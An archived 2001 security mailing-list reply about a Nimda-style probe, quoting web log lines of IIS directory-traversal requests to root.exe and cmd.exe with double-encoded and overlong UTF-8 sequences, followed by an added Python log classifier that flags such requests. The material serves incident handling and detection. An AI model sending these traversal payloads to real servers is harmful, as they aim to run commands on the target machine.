Re: code red request, but cant be resolved?

From: Mike Shaw (mshawat_private)
Date: Thu Oct 25 2001 - 14:26:40 PDT

    It has a reverse lookup (64.148.216.72) but no forward lookup.  That IP 
    block is indeed owned by Internetconnect.
    
    Looks like simple Nimdaness to me.
    
    -Mike
    
    At 04:08 PM 10/25/2001 -0500, Emre Yildirim wrote:
    >Hi,
    >
    >I just got this.  Is it just me, or is this address spoofed?
    >Can anyone resolve dsl-6414821672.internetconnect.net?
    >
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:47 -0500] "GET 
    >/scripts/root.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET 
    >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
    >HTTP/1.0" 302 279 "-" "-"
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET 
    >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
    >HTTP/1.0" 302 279 "-" "-"
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET 
    >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET 
    >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
    >
    >
    >
    >--
    >Emre Yildirim <emreat_private>
    >GPG KeyID 0xF9E4A1D1 (keyserver.pgp.com)
    >
    >
    >----------------------------------------------------------------------------
    >This list is provided by the SecurityFocus ARIS analyzer service.
    >For more information on this free incident handling, management and 
    >tracking system please see: http://aris.securityfocus.com
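
The requests quoted above, run through a small access-log classifier, as an added example that is not part of the original message. The lenient two-byte decode of `%c0`/`%c1` sequences and the reason labels are assumptions of this example; the sample lines are rebuilt from the quoted log, plus one constructed benign request from `client.example`.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# host ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')
# %c0/%c1 lead byte plus one more byte: a permissive decoder folds these to ASCII (assumption)
LENIENT2 = re.compile(r'%(c[01])%([0-9a-f]{2})', re.I)
SHELL = re.compile(r'[/\\](?:cmd|root)\.exe$', re.I)

def _fold(m):
    b1, b2 = int(m.group(1), 16), int(m.group(2), 16)
    return chr(((b1 & 0x1F) << 6) | (b2 & 0x3F))  # %c0%2f -> "/", %c1%1c -> "\"

def classify(path):
    """Return the reasons (hypothetical labels) a request path looks like a traversal probe."""
    raw, reasons = path.split('?', 1)[0], set()
    folded, n = LENIENT2.subn(_fold, raw)
    if n:
        reasons.add('overlong-utf8')
    once = unquote(folded, encoding='latin-1')
    twice = unquote(once, encoding='latin-1')   # %255c -> %5c -> "\"
    if twice != once:
        reasons.add('double-encoding')
    if '..' in re.split(r'[/\\]', twice):
        reasons.add('traversal')
    if SHELL.search(twice):
        reasons.add('shell-exe')
    return reasons

def scan(lines):
    """Map client host -> [(timestamp, status, sorted reasons)] for flagged requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and (why := classify(m.group(3))):
            hits[m.group(1)].append((m.group(2), int(m.group(4)), sorted(why)))
    return dict(hits)

HOST = 'dsl-6414821672.internetconnect.net'
FMT = '{} - - [26/Oct/2001:00:13:{} -0500] "GET {} HTTP/1.0" {} 279 "-" "-"'
REQS = [('47', '/scripts/root.exe?/c+dir'),  # the five requests from the quoted log
        ('49', '/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir'),
        ('49', '/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir'),
        ('50', '/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir'),
        ('50', '/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir')]
SAMPLE = [FMT.format(HOST, s, p, 302) for s, p in REQS]
SAMPLE.append(FMT.format('client.example', '51', '/index.html', 200))  # constructed benign line

if __name__ == '__main__':
    for host, rows in scan(SAMPLE).items():
        print(host, len(rows), 'flagged;', 'statuses', sorted({r[1] for r in rows}))
```

Every flagged request in the sample returned 302, so the status column is worth keeping in the report: a 200 on any of these paths would be the line to investigate first.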
    
    
    
    



    This archive was generated by hypermail 2b30 : Thu Oct 25 2001 - 14:31:24 PDT